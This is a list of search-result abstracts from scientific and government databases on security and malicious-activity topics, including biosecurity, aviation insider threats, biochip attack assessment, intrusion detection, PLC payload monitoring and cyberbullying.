    The life-science community is a key stakeholder in the effort to ensure that the advances in biotechnology are not misused. Unfortunately, to date, the engagement of life scientists with issues of biosecurity has been limited. Microorganisms have been harnessed for the benefit of humankind but in the wrong hands could be used in direct or indirect acts against humans, livestock, crops, food, water infrastructure and other economically valuable entities. The Microbial Resources Research Infrastructure in its preparatory phase has addressed the topic by implementing a code of conduct as part of its programme of prevention of malicious use, and continues to work with the international community to raise awareness of best practice to avoid misuse of microorganisms. Biosecurity has become a major concern for several countries, leading to numerous activities to put in place counter measures, risk assessment, legislation and emergency response. The goal is to implement measures to protect us against malicious use of microorganisms, their products, information and technology transfer. Through this paper, we wish to discuss some of the activities that are underway, mention key educational tools and provide scientists with information on addressing biosecurity issues.

  16. The Threat Among Us: Insiders Intensify Aviation Terrorism

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Krull, Katie E.

    Aviation terrorism is powerful and symbolic, and will likely remain a staple target for terrorists aiming to inflict chaos and cause mass casualties similar to the 9/11 attacks on the U.S. The majority of international and domestic aviation terrorist attacks involves outsiders, or people who do not have direct access to or affiliation with a target through employment. However, several significant attacks and plots against the industry involved malicious employees motivated by suicide or devotion to a terrorist organization. Malicious insiders' access and knowledge of aviation security, systems, networks, and infrastructure is valuable to terrorists, providing a different pathway for attacking the industry through the insider threat. Indicators and warnings of insider threats in these cases exist, providing insight into how security agencies, such as the Transportation Security Administration, can better predict and identify insider involvement. Understanding previous aviation insider threat events will likely aid in stimulating proactive security measures, rather than reactive responses. However, similar to traditional airport security measures, there are social, political, and economic challenges in protecting against the insider threat, including privacy concerns and cost-benefit analysis.

  17. Security Assessment of Cyberphysical Digital Microfluidic Biochips.

    PubMed

    Ali, Sk Subidh; Ibrahim, Mohamed; Sinanoglu, Ozgur; Chakrabarty, Krishnendu; Karri, Ramesh

    2016-01-01

    A digital microfluidic biochip (DMFB) is an emerging technology that enables miniaturized analysis systems for point-of-care clinical diagnostics, DNA sequencing, and environmental monitoring. A DMFB reduces the rate of sample and reagent consumption, and automates the analysis of assays. In this paper, we provide the first assessment of the security vulnerabilities of DMFBs. We identify result-manipulation attacks on a DMFB that maliciously alter the assay outcomes. Two practical result-manipulation attacks are shown on a DMFB platform performing enzymatic glucose assay on serum. In the first attack, the attacker adjusts the concentration of the glucose sample and thereby modifies the final result. In the second attack, the attacker tampers with the calibration curve of the assay operation. We then identify denial-of-service attacks, where the attacker can disrupt the assay operation by tampering either with the droplet-routing algorithm or with the actuation sequence. We demonstrate these attacks using a digital microfluidic synthesis simulator. The results show that the attacks are easy to implement and hard to detect. Therefore, this work highlights the need for effective protections against malicious modifications in DMFBs.

  18. Combating QR-Code-Based Compromised Accounts in Mobile Social Networks.

    PubMed

    Guo, Dong; Cao, Jian; Wang, Xiaoqi; Fu, Qiang; Li, Qiang

    2016-09-20

    Cyber Physical Social Sensing makes mobile social networks (MSNs) popular with users. However, such attacks are rampant as malicious URLs are spread covertly through quick response (QR) codes to control compromised accounts in MSNs to propagate malicious messages. Currently, there are generally two types of methods to identify compromised accounts in MSNs: one type is to analyze the potential threats on wireless access points and the potential threats on handheld devices' operating systems so as to stop compromised accounts from spreading malicious messages; the other type is to apply the method of detecting compromised accounts in online social networks to MSNs. The above types of methods focus neither on the problems of MSNs themselves nor on the interaction of sensors' messages, which leads to the restrictiveness of platforms and the simplification of methods. In order to stop the spreading of compromised accounts in MSNs effectively, the attacks have to be traced to their sources first. Through sensors, users exchange information in MSNs and acquire information by scanning QR codes. Therefore, analyzing the traces of sensor-related information helps to identify the compromised accounts in MSNs. This paper analyzes the diversity of information sending modes of compromised accounts and normal accounts, analyzes the regularity of GPS (Global Positioning System)-based location information, and introduces the concepts of entropy and conditional entropy so as to construct an entropy-based model based on machine learning strategies. To achieve the goal, about 500,000 accounts of Sina Weibo and about 100 million corresponding messages are collected. Through the validation, the accuracy rate of the model is proved to be as high as 87.6%, and the false positive rate is only 3.7%. Meanwhile, the comparative experiments of the feature sets prove that sensor-based location information can be applied to detect the compromised accounts in MSNs.

  19. Combating QR-Code-Based Compromised Accounts in Mobile Social Networks

    PubMed Central

    Guo, Dong; Cao, Jian; Wang, Xiaoqi; Fu, Qiang; Li, Qiang

    2016-01-01

    Cyber Physical Social Sensing makes mobile social networks (MSNs) popular with users. However, such attacks are rampant as malicious URLs are spread covertly through quick response (QR) codes to control compromised accounts in MSNs to propagate malicious messages. Currently, there are generally two types of methods to identify compromised accounts in MSNs: one type is to analyze the potential threats on wireless access points and the potential threats on handheld devices' operating systems so as to stop compromised accounts from spreading malicious messages; the other type is to apply the method of detecting compromised accounts in online social networks to MSNs. The above types of methods focus neither on the problems of MSNs themselves nor on the interaction of sensors' messages, which leads to the restrictiveness of platforms and the simplification of methods. In order to stop the spreading of compromised accounts in MSNs effectively, the attacks have to be traced to their sources first. Through sensors, users exchange information in MSNs and acquire information by scanning QR codes. Therefore, analyzing the traces of sensor-related information helps to identify the compromised accounts in MSNs. This paper analyzes the diversity of information sending modes of compromised accounts and normal accounts, analyzes the regularity of GPS (Global Positioning System)-based location information, and introduces the concepts of entropy and conditional entropy so as to construct an entropy-based model based on machine learning strategies. To achieve the goal, about 500,000 accounts of Sina Weibo and about 100 million corresponding messages are collected. Through the validation, the accuracy rate of the model is proved to be as high as 87.6%, and the false positive rate is only 3.7%. Meanwhile, the comparative experiments of the feature sets prove that sensor-based location information can be applied to detect the compromised accounts in MSNs. PMID:27657071

  20. Performance comparison of the Prophecy (forecasting) Algorithm in FFT form for unseen feature and time-series prediction

    NASA Astrophysics Data System (ADS)

    Jaenisch, Holger; Handley, James

    2013-06-01

    We introduce a generalized numerical prediction and forecasting algorithm. We have previously published it for malware byte sequence feature prediction and generalized distribution modeling for disparate test article analysis. We show how non-trivial non-periodic extrapolation of a numerical sequence (forecast and backcast) from the starting data is possible. Our ancestor-progeny prediction can yield new options for evolutionary programming. Our equations enable analytical integrals and derivatives to any order. Interpolation is controllable from smooth continuous to fractal structure estimation. We show how our generalized trigonometric polynomial can be derived using a Fourier transform.

  1. Privacy and Integrity in the Untrusted Cloud

    DTIC Science & Technology

    2012-06-01

    Dates covered: 2012. Title: Privacy and Integrity in the Untrusted Cloud. ...but still showing them to the user [105]. This behavior is an example of provider equivocation [74, 67], in which a malicious service presents...

  2. The Bystander's Dilemma: How Can We Turn Our Students into Upstanders?

    ERIC Educational Resources Information Center

    Woglom, Lauren; Pennington, Kim

    2010-01-01

    While bullying is often accepted as an integral aspect of "growing up," it can have detrimental and lasting effects on its victims. Bullying can occur in a variety of forms, including direct teasing and threatening, the use of physical violence, and in the spreading of malicious gossip and rumors. With the proliferation of new technology, bullying…

  3. Shaping the Bamboo from the Shoot: Elementary Level Character Education in Malaysia

    ERIC Educational Resources Information Center

    Thambusamy, Roslind; Elier, Adzura Ahmad

    2013-01-01

    This article emphasizes the importance of introducing/providing character education during the early years of child development in order to raise morally responsive citizens. Noting the rampant acts of violence and malicious crime at a time marked with deep global turmoil in many societies, the authors argue for an exhaustive study of the recently…

  4. Physics Does Thrive under the Strangest of Circumstances

    ERIC Educational Resources Information Center

    Khoon, Koh Aik; Abd-Shukor, R.; Jalal, Azman; Talib, Ibrahim Abu; Daud, Abdul Razak; Samat, Supian; Yatim, Baharudin; Radiman, Shahidan

    2008-01-01

    Albert Einstein had famously said that Nature is subtle but not malicious. He should know better because he had unravelled some of the secrets of Nature at a relatively young age as an obscure patent clerk working in isolation. This paper tells of stories of other scientists who had also made ground-breaking discoveries in forced or self-imposed…

  5. Malicious Use of Technology: What Schools, Parents, and Teachers Can Do to Prevent Cyberbullying

    ERIC Educational Resources Information Center

    Morgan, Hani

    2013-01-01

    In today's hyper-connected world, children's exposure to technology as a tool to communicate, learn, and socialize has increased exponentially. As teachers and parents recognize the demands for increased use of technology among young children, they should be able to identify and address the challenges associated with such exposure. Cyberbullying,…

  6. Cyber Exercise Playbook

    DTIC Science & Technology

    2014-11-01

    ...unclassified tools and techniques that can be shared with PNs, to include social engineering, spear phishing, fake web sites, physical access attempts, and... and instead rely on commercial services such as Yahoo or Google. Some nations have quite advanced cyber security practices, but may take vastly... unauthorized access to data/systems. Inject external network scanning, email phishing, malicious website access, social engineering. Sample...

  7. Using Hybrid Algorithm to Improve Intrusion Detection in Multi Layer Feed Forward Neural Networks

    ERIC Educational Resources Information Center

    Ray, Loye Lynn

    2014-01-01

    The need for detecting malicious behavior on computer networks continues to be important to maintaining a safe and secure environment. The purpose of this study was to determine the relationship of multilayer feed forward neural network architecture to the ability to detect abnormal behavior in networks. This involved building, training, and…

  8. 21 CFR 800.12 - Contact lens solutions and tablets; tamper-resistant packaging.

    Code of Federal Regulations, 2010 CFR

    2010-04-01

    ...-resistant retail packages, there is the opportunity for the malicious adulteration of these products with... confidence in the security of the packages of over-the-counter (OTC) health care products. The Food and Drug... used to make such a solution for retail sale that is not packaged in a tamper-resistant package and...

  9. 21 CFR 800.12 - Contact lens solutions and tablets; tamper-resistant packaging.

    Code of Federal Regulations, 2011 CFR

    2011-04-01

    ...-resistant retail packages, there is the opportunity for the malicious adulteration of these products with... confidence in the security of the packages of over-the-counter (OTC) health care products. The Food and Drug... used to make such a solution for retail sale that is not packaged in a tamper-resistant package and...

  10. 21 CFR 800.12 - Contact lens solutions and tablets; tamper-resistant packaging.

    Code of Federal Regulations, 2012 CFR

    2012-04-01

    ...-resistant retail packages, there is the opportunity for the malicious adulteration of these products with... confidence in the security of the packages of over-the-counter (OTC) health care products. The Food and Drug... used to make such a solution for retail sale that is not packaged in a tamper-resistant package and...

  11. 21 CFR 800.12 - Contact lens solutions and tablets; tamper-resistant packaging.

    Code of Federal Regulations, 2013 CFR

    2013-04-01

    ...-resistant retail packages, there is the opportunity for the malicious adulteration of these products with... confidence in the security of the packages of over-the-counter (OTC) health care products. The Food and Drug... used to make such a solution for retail sale that is not packaged in a tamper-resistant package and...

  12. 21 CFR 800.12 - Contact lens solutions and tablets; tamper-resistant packaging.

    Code of Federal Regulations, 2014 CFR

    2014-04-01

    ...-resistant retail packages, there is the opportunity for the malicious adulteration of these products with... confidence in the security of the packages of over-the-counter (OTC) health care products. The Food and Drug... used to make such a solution for retail sale that is not packaged in a tamper-resistant package and...

  13. Polymorphic Attacks and Network Topology: Application of Concepts from Natural Systems

    ERIC Educational Resources Information Center

    Rangan, Prahalad

    2010-01-01

    The growing complexity of interactions between computers and networks makes the subject of network security a very interesting one. As our dependence on the services provided by computing networks grows, so does our investment in such technology. In this situation, there is a greater risk of occurrence of targeted malicious attacks on computers…

  14. Building Trust-Based Sustainable Networks

    DTIC Science & Technology

    2013-06-05

    entities to build sustainable networks with limited resources or misbehaving entities by learning from the lessons in the social sciences. We discuss...their individuality); and ■ Misbehaving nodes in terms of environmental, economic, and social perspectives. The sustainable network concerns...equitable access to particular services which are otherwise abused by misbehaving or malicious users. Such approaches provide a fair and

  15. The Insider Threat Security Architecture: An Integrated, Inseparable, and Uninterrupted Self-Protection Autonomic Framework

    ERIC Educational Resources Information Center

    Jabbour, Ghassan

    2010-01-01

    The increasing proliferation of globally interconnected complex information systems has elevated the magnitude of attacks and the level of damage that they inflict on such systems. This open environment of intertwined financial, medical, defense, and other systems has attracted hackers to increase their malicious activities to cause harm or to…

  16. Patterns in Patient Access and Utilization of Online Medical Records: Analysis of MyChart.

    PubMed

    Redelmeier, Donald A; Kraus, Nicole C

    2018-02-06

    Electronic patient portals provide a new method for sharing personal medical information with individual patients. Our aim was to review utilization patterns of the largest online patient portal in Canada's largest city. We conducted a 4-year time-trend analysis of aggregated anonymous utilization data of the MyChart patient portal at Sunnybrook Health Sciences Centre in Ontario, Canada, from January 1, 2012, through December 31, 2015. Prespecified analyses examined trends related to day (weekend vs weekday), season (July vs January), year (2012 vs 2015), and an extreme adverse weather event (ice storm of December 20-26, 2013). Primary endpoints included three measures of patient portal activity: registrations, logins, and pageviews. We identified 32,325 patients who registered for a MyChart account during the study interval. Time-trend analysis showed no sign of attenuating registrations over time. Logins were frequent, averaged 734 total per day, and showed an increasing trend over time. Pageviews mirrored logins, averaged about 3029 total per day, and equated to about 5 pageviews during the average login. The most popular pageviews were clinical notes, followed by laboratory results and medical imaging reports. All measures of patient activity were lower on weekends compared to weekdays (P<.001) yet showed no significant changes related to seasons or extreme weather. No major security breach, malware attack, or software failure occurred during the study. Online patient portals can provide a popular and reliable system for distributing personal medical information to active patients and may merit consideration for hospitals. ©Donald A Redelmeier, Nicole C Kraus. Originally published in the Journal of Medical Internet Research (http://www.jmir.org), 06.02.2018.

  17. Minimizing liability during internal investigations.

    PubMed

    Morris, Cole

    2010-01-01

    Today's security professional must appreciate the potential landmines in any investigative effort and work collaboratively with others to minimize liability risks, the author points out. In this article he examines six civil torts that commonly arise from unprofessionally planned or poorly executed internal investigations: defamation, false imprisonment, intentional infliction of emotional distress, assault and battery, invasion of privacy, and malicious prosecution and abuse of process.

  18. R&D100: IC ID

    ScienceCinema

    Hamlet, Jason; Pierson, Lyndon; Bauer, Todd

    2018-06-25

    Supply chain security to detect, deter, and prevent the counterfeiting of networked and stand-alone integrated circuits (ICs) is critical to cyber security. Sandia National Laboratory researchers have developed IC ID to leverage Physically Unclonable Functions (PUFs) and strong cryptographic authentication to create a unique fingerprint for each integrated circuit. IC ID assures the authenticity of ICs to prevent tampering or malicious substitution.

  19. DSB Task Force on Cyber Supply Chain

    DTIC Science & Technology

    2017-04-01

    ...seeking to exploit a maliciously inserted vulnerability must execute each step in the kill chain: Intelligence and planning: gathering... are intended to take a comprehensive approach in considering all aspects of system security, including cybersecurity, and address initial steps to... specific integrated circuits (ASICs). That need is likely to grow for systems that support intelligent or autonomous capabilities. The current...

  20. Thermal remote sensing of active vegetation fires and biomass burning events [Chapter 18]

    Treesearch

    Martin J. Wooster; Gareth Roberts; Alistair M.S. Smith; Joshua Johnston; Patrick Freeborn; Stefania Amici; Andrew T. Hudak

    2013-01-01

    Thermal remote sensing is widely used in the detection, study, and management of biomass burning occurring in open vegetation fires. Such fires may be planned for land management purposes, may occur as a result of a malicious or accidental ignition by humans, or may result from lightning or other natural phenomena. Under suitable conditions, fires may spread rapidly...

  1. Automated Program Analysis for Cybersecurity (APAC)

    DTIC Science & Technology

    2016-07-14

    Automated Program Analysis for Cybersecurity (APAC). Five Directions, Inc., July 2016, Final Technical Report, approved... Contract number FA8750-14-C-0050; grant number N/A; program element number 61101E; author William Arbaugh... AC Team: Adversarial Challenge Team, responsible for creating malicious applications. APAC: Automated Program Analysis for Cybersecurity. BAE: BAE Systems.

  2. Phishing E-Mails--Six Month Investigation into What People Click

    ERIC Educational Resources Information Center

    Lehrfeld, Michael R.

    2014-01-01

    Phishing and SPAM emails have been used by marketers and hackers alike since the inception of email and the Internet. Phishing messages have become so common that many legitimate emails often get flagged and placed in a user's spam bucket. No one is denying that these messages are at a minimum a nuisance, and in many cases malicious. But what is…

  3. Secure and Fair Cluster Head Selection Protocol for Enhancing Security in Mobile Ad Hoc Networks

    PubMed Central

    Paramasivan, B.; Kaliappan, M.

    2014-01-01

    Mobile ad hoc networks (MANETs) are wireless networks consisting of a number of autonomous mobile devices temporarily interconnected into a network by wireless media. MANETs have become one of the most prevalent areas of research in recent years. Resource limitations, energy efficiency, scalability, and security are the great challenging issues in MANETs. Due to their deployment nature, MANETs are more vulnerable to malicious attack. The secure routing protocols perform very basic security related functions which are not sufficient to protect the network. In this paper, a secure and fair cluster head selection protocol (SFCP) is proposed which integrates security factors into the clustering approach for achieving attacker identification and classification. A Byzantine agreement based cooperative technique is used for attacker identification and classification to make the network more attack resistant. SFCP is used to solve this issue by making the nodes that are totally surrounded by malicious neighbors adjust their belief and disbelief thresholds dynamically. The proposed protocol selects the secure and energy efficient cluster head which acts as a local detector without imposing overhead on the clustering performance. SFCP is simulated in network simulator 2 and compared with two protocols, AODV and CBRP. PMID:25143986

  4. Impact of Information based Classification on Network Epidemics

    PubMed Central

    Mishra, Bimal Kumar; Haldar, Kaushik; Sinha, Durgesh Nandini

    2016-01-01

    Formulating mathematical models for accurate approximation of malicious propagation in a network is a difficult process because of our inherent lack of understanding of several underlying physical processes that intrinsically characterize the broader picture. The aim of this paper is to understand the impact of available information in the control of malicious network epidemics. A 1-n-n-1 type differential epidemic model is proposed, where the differentiality allows a symptom based classification. This is the first such attempt to add such a classification into the existing epidemic framework. The model is incorporated into a five class system called the DifEpGoss architecture. Analysis reveals an epidemic threshold, based on which the long-term behavior of the system is analyzed. In this work three real network datasets with 22002, 22469 and 22607 undirected edges respectively, are used. The datasets show that classification based prevention given in the model can have a good role in containing network epidemics. Further simulation based experiments are used with a three category classification of attack and defense strengths, which allows us to consider 27 different possibilities. These experiments further corroborate the utility of the proposed model. The paper concludes with several interesting results. PMID:27329348

  5. Time Pattern Locking Scheme for Secure Multimedia Contents in Human-Centric Device

    PubMed Central

    Kim, Hyun-Woo; Kim, Jun-Ho; Park, Jong Hyuk; Jeong, Young-Sik

    2014-01-01

    Among the various smart multimedia devices, multimedia smartphones have become the most widespread due to their convenient portability and real-time information sharing, as well as various other built-in features. Accordingly, since personal and business activities can be carried out using multimedia smartphones without restrictions based on time and location, people have more leisure time and convenience than ever. However, problems such as loss, theft, and information leakage because of convenient portability have also increased proportionally. As a result, most multimedia smartphones are equipped with various built-in locking features. Pattern lock, personal identification numbers, and passwords are the most used locking features on current smartphones, but these are vulnerable to shoulder surfing and smudge attacks, allowing malicious users to bypass the security feature easily. In particular, the smudge attack technique is a convenient way to unlock multimedia smartphones after they have been stolen. In this paper, we propose the secure locking screen using time pattern (SLSTP), focusing on improved security and convenience for users to fully support human-centric multimedia devices. The SLSTP can provide a simple interface to users and reduce the risk factors pertaining to security leakage to malicious third parties. PMID:25202737

  6. Secure and fair cluster head selection protocol for enhancing security in mobile ad hoc networks.

    PubMed

    Paramasivan, B; Kaliappan, M

    2014-01-01

    Mobile ad hoc networks (MANETs) are wireless networks consisting of a number of autonomous mobile devices temporarily interconnected into a network by wireless media. MANETs have become one of the most prevalent areas of research in recent years. Resource limitations, energy efficiency, scalability, and security are the great challenging issues in MANETs. Due to their deployment nature, MANETs are more vulnerable to malicious attack. The secure routing protocols perform very basic security related functions which are not sufficient to protect the network. In this paper, a secure and fair cluster head selection protocol (SFCP) is proposed which integrates security factors into the clustering approach for achieving attacker identification and classification. A Byzantine agreement based cooperative technique is used for attacker identification and classification to make the network more attack resistant. SFCP is used to solve this issue by making the nodes that are totally surrounded by malicious neighbors adjust their belief and disbelief thresholds dynamically. The proposed protocol selects the secure and energy efficient cluster head which acts as a local detector without imposing overhead on the clustering performance. SFCP is simulated in network simulator 2 and compared with two protocols, AODV and CBRP.

  7. Time pattern locking scheme for secure multimedia contents in human-centric device.

    PubMed

    Kim, Hyun-Woo; Kim, Jun-Ho; Park, Jong Hyuk; Jeong, Young-Sik

    2014-01-01

    Among the various smart multimedia devices, multimedia smartphones have become the most widespread due to their convenient portability and real-time information sharing, as well as various other built-in features. Accordingly, since personal and business activities can be carried out using multimedia smartphones without restrictions based on time and location, people have more leisure time and convenience than ever. However, problems such as loss, theft, and information leakage because of convenient portability have also increased proportionally. As a result, most multimedia smartphones are equipped with various built-in locking features. Pattern lock, personal identification numbers, and passwords are the most used locking features on current smartphones, but these are vulnerable to shoulder surfing and smudge attacks, allowing malicious users to bypass the security feature easily. In particular, the smudge attack technique is a convenient way to unlock multimedia smartphones after they have been stolen. In this paper, we propose the secure locking screen using time pattern (SLSTP), focusing on improved security and convenience for users to fully support human-centric multimedia devices. The SLSTP can provide a simple interface to users and reduce the risk factors pertaining to security leakage to malicious third parties.

  8. FuGeF: A Resource Bound Secure Forwarding Protocol for Wireless Sensor Networks

    PubMed Central

    Umar, Idris Abubakar; Mohd Hanapi, Zurina; Sali, A.; Zulkarnain, Zuriati A.

    2016-01-01

    Resource bound security solutions have facilitated the mitigation of spatio-temporal attacks by altering protocol semantics to provide minimal security while maintaining an acceptable level of performance. The Dynamic Window Secured Implicit Geographic Forwarding (DWSIGF) routing protocol for Wireless Sensor Network (WSN) has been proposed to achieve a minimal selection of malicious nodes by introducing a dynamic collection window period to the protocol’s semantics. However, its selection scheme suffers substantial packet losses due to the utilization of a single distance based parameter for node selection. In this paper, we propose a Fuzzy-based Geographic Forwarding protocol (FuGeF) to minimize packet loss, while maintaining performance. The FuGeF utilizes a new form of dynamism and introduces three selection parameters: remaining energy, connectivity cost, and progressive distance, as well as a Fuzzy Logic System (FLS) for node selection. These introduced mechanisms ensure the appropriate selection of a non-malicious node. Extensive simulation experiments have been conducted to evaluate the performance of the proposed FuGeF protocol as compared to DWSIGF variants. The simulation results show that the proposed FuGeF outperforms the two DWSIGF variants (DWSIGF-P and DWSIGF-R) in terms of packet delivery. PMID:27338411

  9. A Malicious Pattern Detection Engine for Embedded Security Systems in the Internet of Things

    PubMed Central

    Oh, Doohwan; Kim, Deokho; Ro, Won Woo

    2014-01-01

    With the emergence of the Internet of Things (IoT), a large number of physical objects in daily life have been aggressively connected to the Internet. As the number of objects connected to networks increases, the security systems face a critical challenge due to the global connectivity and accessibility of the IoT. However, it is difficult to adapt traditional security systems to the objects in the IoT, because of their limited computing power and memory size. In light of this, we present a lightweight security system that uses a novel malicious pattern-matching engine. We limit the memory usage of the proposed system in order to make it work on resource-constrained devices. To mitigate performance degradation due to limitations of computation power and memory, we propose two novel techniques, auxiliary shifting and early decision. Through both techniques, we can efficiently reduce the number of matching operations on resource-constrained systems. Experiments and performance analyses show that our proposed system achieves a maximum speedup of 2.14 with an IoT object and provides scalable performance for a large number of patterns. PMID:25521382

  10. Social/Ethical Issues in Predictive Insider Threat Monitoring

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Greitzer, Frank L.; Frincke, Deborah A.; Zabriskie, Mariah

    2011-01-01

    Combining traditionally monitored cybersecurity data with other kinds of organizational data is one option for inferring the motivations of individuals, which may in turn allow early prediction and mitigation of insider threats. While unproven, some researchers believe that this combination of data may yield better results than either cybersecurity or organizational data would in isolation. However, this nontraditional approach creates a potential conflict between goals, such as conflicts between organizational security improvements and individual privacy considerations. There are many facets to debate. Should warning signs of a potential malicious insider be addressed before a malicious event has occurred to prevent harm to the organization and discourage the insider from violating the organization’s rules? Would intervention violate employee trust or legal guidelines? What about the possibilities of misuse? Predictive approaches cannot be validated a priori; false accusations can affect the career of the accused; and collection/monitoring of certain types of data may affect employee morale. In this chapter, we explore some of the social and ethical issues stemming from predictive insider threat monitoring and discuss ways that a predictive modeling approach brings to the forefront social and ethical issues that should be considered and resolved by stakeholders and communities of interest.

  11. Understanding the Value of a Computer Emergency Response Capability for Nuclear Security

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Gasper, Peter Donald; Rodriguez, Julio Gallardo

    The international nuclear community has a great understanding of the physical security needs relating to the prevention, detection, and response of malicious acts associated with nuclear facilities and radioactive material. International Atomic Energy Agency (IAEA) Nuclear Security Recommendations (INFCIRC_225_Rev 5) outlines specific guidelines and recommendations for implementing and maintaining an organization’s nuclear security posture. An important element for inclusion into supporting revision 5 is the establishment of a “Cyber Emergency Response Team (CERT)” focused on the international community’s cybersecurity needs to maintain a comprehensive nuclear security posture. Cybersecurity and the importance of nuclear cybersecurity require that there be a specific focus on developing an International Nuclear CERT (NS-CERT). States establishing contingency plans should have an understanding of the cyber threat landscape and the potential impacts to systems in place to protect against and mitigate malicious activities. This paper will outline the necessary components, discuss the relationships needed within the international community, and outline a process by which the NS-CERT identifies, collects, processes, and reports critical information in order to establish situational awareness (SA) and support decision-making.

  12. Novel Duplicate Address Detection with Hash Function

    PubMed Central

    Song, GuangJia; Ji, ZhenZhou

    2016-01-01

    Duplicate address detection (DAD) is an important component of the address resolution protocol (ARP) and the neighbor discovery protocol (NDP). DAD determines whether an IP address is in conflict with other nodes. In traditional DAD, the target address to be detected is broadcast through the network, which provides convenience for malicious nodes to attack. A malicious node can send a spoofing reply to prevent the address configuration of a normal node, and thus, a denial-of-service attack is launched. This study proposes a hash method to hide the target address in DAD, which prevents an attack node from launching destination attacks. If the address of a normal node is identical to the detection address, then its hash value should be the same as the “Hash_64” field in the neighboring solicitation message. Consequently, DAD can be successfully completed. This process is called DAD-h. Simulation results indicate that address configuration using DAD-h has a considerably higher success rate when under attack compared with traditional DAD. Comparative analysis shows that DAD-h does not require third-party devices and considerable computing resources; it also provides a lightweight security resolution. PMID:26991901

  13. Deviation-based spam-filtering method via stochastic approach

    NASA Astrophysics Data System (ADS)

    Lee, Daekyung; Lee, Mi Jin; Kim, Beom Jun

    2018-03-01

    In the presence of a huge number of possible purchase choices, ranks or ratings of items by others often play very important roles for a buyer to make a final purchase decision. A perfectly objective rating is an impossible task to achieve, and we often use an average rating built on how previous buyers estimated the quality of the product. The problem with using a simple average rating is that it can easily be polluted by careless users whose evaluation of products cannot be trusted, and by malicious spammers who try to bias the rating result on purpose. In this letter we suggest how the trustworthiness of individual users can be systematically and quantitatively reflected to build a more reliable rating system. We compute the suitably defined reliability of each user based on the user's rating pattern for all products she evaluated. We call our proposed method the deviation-based ranking, since the statistical significance of each user's rating pattern with respect to the average rating pattern is the key ingredient. We find that our deviation-based ranking method outperforms existing methods in filtering out careless random evaluators as well as malicious spammers.

  14. FuGeF: A Resource Bound Secure Forwarding Protocol for Wireless Sensor Networks.

    PubMed

    Umar, Idris Abubakar; Mohd Hanapi, Zurina; Sali, A; Zulkarnain, Zuriati A

    2016-06-22

    Resource bound security solutions have facilitated the mitigation of spatio-temporal attacks by altering protocol semantics to provide minimal security while maintaining an acceptable level of performance. The Dynamic Window Secured Implicit Geographic Forwarding (DWSIGF) routing protocol for Wireless Sensor Network (WSN) has been proposed to achieve a minimal selection of malicious nodes by introducing a dynamic collection window period to the protocol's semantics. However, its selection scheme suffers substantial packet losses due to the utilization of a single distance based parameter for node selection. In this paper, we propose a Fuzzy-based Geographic Forwarding protocol (FuGeF) to minimize packet loss, while maintaining performance. The FuGeF utilizes a new form of dynamism and introduces three selection parameters: remaining energy, connectivity cost, and progressive distance, as well as a Fuzzy Logic System (FLS) for node selection. These introduced mechanisms ensure the appropriate selection of a non-malicious node. Extensive simulation experiments have been conducted to evaluate the performance of the proposed FuGeF protocol as compared to DWSIGF variants. The simulation results show that the proposed FuGeF outperforms the two DWSIGF variants (DWSIGF-P and DWSIGF-R) in terms of packet delivery.

  15. Detecting Payload Attacks on Programmable Logic Controllers (PLCs)

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Yang, Huan

    Programmable logic controllers (PLCs) play critical roles in industrial control systems (ICS). Providing hardware peripherals and firmware support for control programs (i.e., a PLC’s “payload”) written in languages such as ladder logic, PLCs directly receive sensor readings and control ICS physical processes. An attacker with access to PLC development software (e.g., by compromising an engineering workstation) can modify the payload program and cause severe physical damage to the ICS. To protect critical ICS infrastructure, we propose to model the runtime behaviors of legitimate PLC payload programs and use runtime behavior monitoring in PLC firmware to detect payload attacks. By monitoring the I/O access patterns, network access patterns, as well as payload program timing characteristics, our proposed firmware-level detection mechanism can detect abnormal runtime behaviors of malicious PLC payloads. Using our proof-of-concept implementation, we evaluate the memory and execution time overhead of implementing our proposed method and find that it is feasible to incorporate our method into existing PLC firmware. In addition, our evaluation results show that a wide variety of payload attacks can be effectively detected by our proposed approach. The proposed firmware-level payload attack detection scheme complements existing bump-in-the-wire solutions (e.g., external temporal-logic-based model checkers) in that it can detect payload attacks that violate real-time requirements of ICS operations and does not require any additional apparatus.

  16. Authorship attribution of source code by using back propagation neural network based on particle swarm optimization

    PubMed Central

    Xu, Guoai; Li, Qi; Guo, Yanhui; Zhang, Miao

    2017-01-01

    Authorship attribution is the task of identifying the most likely author of a given sample among a set of candidate known authors. It can be applied not only to discover the original author of plain text, such as novels, blogs, emails, posts, etc., but also to identify source code programmers. Authorship attribution of source code is required in diverse applications, ranging from malicious code tracking to resolving authorship disputes or detecting software plagiarism. This paper aims to propose a new method to identify the programmer of Java source code samples with higher accuracy. To this end, it first introduces a back propagation (BP) neural network based on particle swarm optimization (PSO) into authorship attribution of source code. It begins by computing a set of defined feature metrics, including lexical and layout metrics and structure and syntax metrics, totalling 19 dimensions. These metrics are then input to the neural network for supervised learning, the weights of which are output by the PSO and BP hybrid algorithm. The effectiveness of the proposed method is evaluated on a collected dataset of 3,022 Java files belonging to 40 authors. Experiment results show that the proposed method achieves 91.060% accuracy. A comparison with previous work on authorship attribution of source code for the Java language illustrates that the proposed method outperforms the others overall, also with an acceptable overhead. PMID:29095934

  17. Real time biometric surveillance with gait recognition

    NASA Astrophysics Data System (ADS)

    Mohapatra, Subasish; Swain, Anisha; Das, Manaswini; Mohanty, Subhadarshini

    2018-04-01

    Biometric surveillance has become indispensable for every system in recent years. Biometric authentication, identification, and screening are widely used in various domains for preventing unauthorized access. A large amount of data needs to be updated, segregated and safeguarded from malicious software and misuse. Biometrics are the intrinsic characteristics of each individual. Recently fingerprints, iris, passwords, unique keys, and cards have commonly been used for authentication purposes. These methods have various issues related to security and confidentiality. These systems are not yet automated to provide safety and security. The gait recognition system is the alternative for overcoming the drawbacks of the recent biometric based authentication systems. Gait recognition is newer, as it hasn't been implemented in a real-world scenario so far. This is an unobtrusive system that requires no knowledge or cooperation of the subject. Gait is a unique behavioral characteristic of every human being which is hard to imitate. The walking style of an individual, combined with the orientation of joints in the skeletal structure and the inclinations between them, imparts the unique characteristic. A person can alter their own external appearance but not their skeletal structure. These are real-time, automatic systems that can even process low-resolution images and video frames. In this paper, we have proposed a gait recognition system and compared its performance with conventional biometric identification systems.

  18. Develop a solution for protecting and securing enterprise networks from malicious attacks

    NASA Astrophysics Data System (ADS)

    Kamuru, Harshitha; Nijim, Mais

    2014-05-01

